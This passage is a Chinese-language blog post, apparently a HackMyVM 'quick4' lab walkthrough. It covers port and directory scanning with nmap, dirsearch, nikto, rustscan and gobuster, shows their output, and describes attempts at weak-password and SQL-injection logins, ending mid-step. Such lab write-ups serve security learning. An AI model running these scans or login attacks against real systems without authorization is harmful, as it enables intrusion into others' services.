{"id":403,"date":"2024-03-16T21:19:50","date_gmt":"2024-03-16T13:19:50","guid":{"rendered":"http:\/\/162.14.82.114\/?p=403"},"modified":"2024-03-16T21:19:50","modified_gmt":"2024-03-16T13:19:50","slug":"hmv-_-quick4","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/403\/03\/16\/2024\/","title":{"rendered":"hmv[-_-]quick4"},"content":{"rendered":"<h1>quick4<\/h1>\n<p>\u4ee5\u524d\u7684\u5c0f\u9776\u573a\u914d\u7f6e\u4e0d\u4e86\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u6700\u8fd1\u7684\u9776\u573a\u5427\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116199.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116199.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316180300792\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0d\u5230\u9ec4\u6cb3\u5fc3\u4e0d\u6b7b\uff0c\u5c31\u662f\u4e0d\u7528virtualbox\uff08\u914d\u9776\u573a\u914d\u5230\u4e27\u5fc3\u75c5\u72c2\uff09\u3002<\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<p>\u626b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">nmap -p- -T4 -sV 10.161.187.177<\/code><\/pre>\n<pre><code class=\"language-text\">Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-03-16 06:10 EDT\nNmap scan report for 10.161.187.177\nHost is up (0.00079s latency).\nNot shown: 65533 closed tcp ports (conn-refused)\nPORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)\n80\/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 9.17 seconds<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">dirsearch -u http:\/\/10.161.187.177 -e* -i 200,300-399<\/code><\/pre>\n<pre><code class=\"language-text\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ dirsearch -u http:\/\/10.161.187.177 -e* -i 200,300-399                                           \n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )                                                                                                                                                                              \nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\nOutput File: \/home\/kali\/reports\/http_10.161.187.177\/_24-03-16_06-13-08.txt\nTarget: http:\/\/10.161.187.177\/\n[06:13:08] Starting:\n[06:13:09] 301 -  313B  - \/js  -&gt;  http:\/\/10.161.187.177\/js\/                \n[06:13:11] 200 -  417B  - \/.well-known\/security.txt                         \n[06:13:12] 200 -    2KB - \/404.html                                         \n[06:13:27] 301 -  318B  - \/careers  -&gt;  http:\/\/10.161.187.177\/careers\/      \n[06:13:30] 301 -  314B  - \/css  -&gt;  http:\/\/10.161.187.177\/css\/              \n[06:13:30] 301 -  319B  - \/customer  -&gt;  http:\/\/10.161.187.177\/customer\/    \n[06:13:34] 301 -  316B  - \/fonts  -&gt;  http:\/\/10.161.187.177\/fonts\/          \n[06:13:36] 301 -  317B  - \/images  -&gt;  http:\/\/10.161.187.177\/images\/        \n[06:13:36] 301 -  314B  - \/img  -&gt;  http:\/\/10.161.187.177\/img\/              \n[06:13:39] 301 -  314B  - \/lib  -&gt;  http:\/\/10.161.187.177\/lib\/              \n[06:13:42] 301 -  318B  - \/modules  -&gt;  http:\/\/10.161.187.177\/modules\/      \n[06:13:51] 200 -   32B  - \/robots.txt                                       \nTask Completed <\/code><\/pre>\n<h2>\u6f0f\u6d1e\u5229\u7528<\/h2>\n<p>\u67e5\u770b\u4e00\u4e0b\u7f51\u9875\uff0c\u4f3c\u4e4e\u662f\u4e00\u4e2a\u4f01\u4e1a\u7f51\u7ad9\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116203.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116203.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316181427291\" \/><\/div><\/p>\n<h3>Wappalyzer\u63d2\u4ef6\u67e5\u770b<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116206.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116206.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316181602049\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>\u67e5\u770b\u654f\u611f\u76ee\u5f55<\/h3>\n<pre><code class=\"language-php\"># http:\/\/10.161.187.177\/robots.txt\nUser-agent: *\nDisallow: \/admin\/<\/code><\/pre>\n<pre><code class=\"language-php\"># http:\/\/10.161.187.177\/.well-known\/security.txt\nContact:\n- mailto:super.secure@quick.hmv (Serious business only)\n- tel:+1-800-NO-HACKS (Available 24\/7, except on April Fools&#039; Day)\n\nPolicy: https:\/\/quick.hmv\/security-policy\nEncryption: https:\/\/quick.hmv\/pgp-key.txt\nAcknowledgments: https:\/\/quick.hmv\/security-hall-of-fame.html\nPreferred-Languages: en, es, fr, nl, de\nCanonical: https:\/\/quick.hmv\/.well-known\/security.txt\nPolicy: https:\/\/quick.hmv\/security-policy\nHiring: https:\/\/quick.hmv\/careers\/security-engineer.html\nCSAF: https:\/\/quick.hmv\/csaf-provider-metadata.json\n# If you&#039;ve made it this far, congratulations! As a reward, here&#039;s a secret:\n# We hid an Easter egg in our website&#039;s source code. Can you find it?\n# Happy hunting!<\/code><\/pre>\n<h3>\u8e29\u70b9<\/h3>\n<p>\u53bb\u7f51\u9875\u770b\u770b\uff0c\u70b9\u51fb\u53f3\u4e0a\u89d2\uff0c\u53d1\u73b0\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116207.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116207.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316182253075\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u5f31\u5bc6\u7801\u4ee5\u53ca\u4e07\u80fd\u5bc6\u7801\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116208.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116208.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316182407592\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u600e\u4e48\u56de\u4e8b\uff0c\u600e\u4e48\u5728\u8fd9\u91cc\u5f39\u51fa\u6765\u4e86\uff0c\u67e5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116209.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116209.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316182550496\" style=\"zoom:67%;\" \/><\/div><\/p>\n<p>\u4f3c\u4e4e\u662f\u4fdd\u5b58\u767b\u5f55\u8bb0\u5f55\u7684\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u6ce8\u518c\u4e00\u4e2a\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116210.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116210.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316182653442\" style=\"zoom: 33%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116211.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116211.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316182721096\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u6ce8\u518c\u6210\u529f\u4e86\uff0c\u767b\u5f55\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116212.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116212.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316182746802\" \/><\/div><\/p>\n<p>\u5230\u5904\u770b\u770b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116213.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116213.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316182930820\" \/><\/div><\/p>\n<p>\u6709\u4e2a\u6539\u5bc6\u7801\u7684\u5730\u65b9\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116214.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116214.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316183036998\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6709\u4e2a\u6dfb\u52a0\u6570\u636e\u7684\u5730\u65b9\uff0c\u53ef\u4ee5\u5c1d\u8bd5sql\u6ce8\u5165\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116215.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116215.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316183110618\" \/><\/div><\/p>\n<p>\u8fd8\u6709\u4e00\u4e9b\u7528\u6237\u4fe1\u606f\uff0c\u548b\u50cfdb\u7f51\u7ad9\uff0c\u4f46\u662f\u90fd\u70b9\u4e0d\u4e86\u3002<\/p>\n<h3>\u5bfb\u627e\u6f0f\u6d1e<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116216.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116216.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316183352229\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116217.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116217.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316184504022\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5bc6\u7801\u53ef\u4ee5\u6539\uff0c\u800c\u4e14\u7f51\u9875\u4e3a<code>?id=29<\/code>\uff0c\u5c1d\u8bd5\u6362\u6210\u5176\u4ed6\u7684\u8bd5\u8bd5\uff0c\u4f46\u662f\u6ca1\u53d1\u751f\u53d8\u5316\u3002\u53ea\u80fd\u53bb\u770b\u770b\u5176\u4ed6\u65b9\u6cd5\u4e86\uff0c\u518d\u4fe1\u606f\u641c\u96c6\u4e00\u6ce2\u3002<\/p>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">nikto -h http:\/\/10.161.187.177<\/code><\/pre>\n<pre><code>- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          10.161.187.177\n+ Target Hostname:    10.161.187.177\n+ Target Port:        80\n+ Start Time:         2024-03-16 07:04:52 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.52 (Ubuntu)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ \/robots.txt: contains 1 entry which should be manually viewed. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Glossary\/Robots.txt\n+ \/images: IP address found in the &#039;location&#039; header. The IP is &quot;127.0.1.1&quot;. See: https:\/\/portswigger.net\/kb\/issues\/00600300_private-ip-addresses-disclosed\n+ \/images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP\/1.0. The value is &quot;127.0.1.1&quot;. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2000-0649\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: c8d6, size: 6103122781180, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ Apache\/2.4.52 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS .\n+ 8103 requests: 0 error(s) and 8 item(s) reported on remote host\n+ End Time:           2024-03-16 07:05:08 (GMT-4) (16 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<p>\u521a\u521a\u90a3\u4e2a\u7591\u4f3c\u7684\u5730\u65b9\u6211\u8bd5\u4e86\u51e0\u4e2a\u6ca1\u6709\u8bd5\u51fa\u6765\u6709\u5565\u5229\u7528\u70b9\u3002<\/p>\n<h2>\u91cd\u65b0\u4fe1\u606f\u641c\u96c6<\/h2>\n<p>\u770b\u4e00\u4e0b\u5176\u4ed6\u7684\u76ee\u5f55\u5427\uff0c\u6ce8\u518c\u8fdb\u53bb\u7684\u6ca1\u6709\u5565\u6536\u83b7\uff0c\u6ca1\u5565\u4e1c\u897f\u554a\uff01\u96be\u9053\u9057\u6f0f\u4e86\u5565\uff1f\u91cd\u65b0\u626b\u4e00\u4e0b<\/p>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 10.161.187.177<\/code><\/pre>\n<pre><code>PORT   STATE SERVICE REASON\n22\/tcp open  ssh     syn-ack\n80\/tcp open  http    syn-ack<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ gobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/10.161.187.177 -f -t 200\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/10.161.187.177\n[+] Method:                  GET\n[+] Threads:                 200\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Add Slash:               true\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/img\/                 (Status: 403) [Size: 279]\n\/icons\/               (Status: 403) [Size: 279]\n\/css\/                 (Status: 403) [Size: 279]\n\/lib\/                 (Status: 403) [Size: 279]\n\/js\/                  (Status: 403) [Size: 279]\n\/customer\/            (Status: 200) [Size: 2172]\n\/images\/              (Status: 403) [Size: 279]\n\/fonts\/               (Status: 403) [Size: 279]\n\/employee\/            (Status: 200) [Size: 3684]\n\/modules\/             (Status: 403) [Size: 279]\n\/careers\/             (Status: 403) [Size: 279]\n\/server-status\/       (Status: 403) [Size: 279]\nProgress: 143599 \/ 220561 (65.11%)[ERROR] Get &quot;http:\/\/10.161.187.177\/customized\/&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================\n<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u6398<\/h2>\n<h3>sql\u6ce8\u5165<\/h3>\n<p>\u53c8\u591a\u626b\u51fa\u6765\u4e00\u4e2a\u76ee\u5f55<code>employee<\/code>\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116218.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116218.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316191817121\" \/><\/div><\/p>\n<p>\u53c8\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u6211\u64e6\u3002\u5c1d\u8bd5\u767b\u5f55\u53d1\u73b0\u5931\u8d25\u4e86\uff0c\u5e94\u8be5\u662f\u7ba1\u7406\u754c\u9762\uff1a<\/p>\n<p>\u5c1d\u8bd5\u4e07\u80fd\u5bc6\u7801\uff0c\u5931\u8d25\uff0c\u5f31\u5bc6\u7801\u4e5f\u5931\u8d25\u4e86\u3002<\/p>\n<p>\u518d\u8bd5\u8bd5\u5176\u4ed6\u7684\u65b9\u6cd5\uff0c\u7528\u6237\u540d\u4f3c\u4e4e\u5fc5\u987b\u5f97\u662f\u7b26\u5408\u8981\u6c42\u7684\uff0c\u5c1d\u8bd5\u5728\u5bc6\u7801\u7aef\u8fdb\u884c\u6ce8\u5165\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116219.png'><img class=\"lazyload lazyload-style-2\" 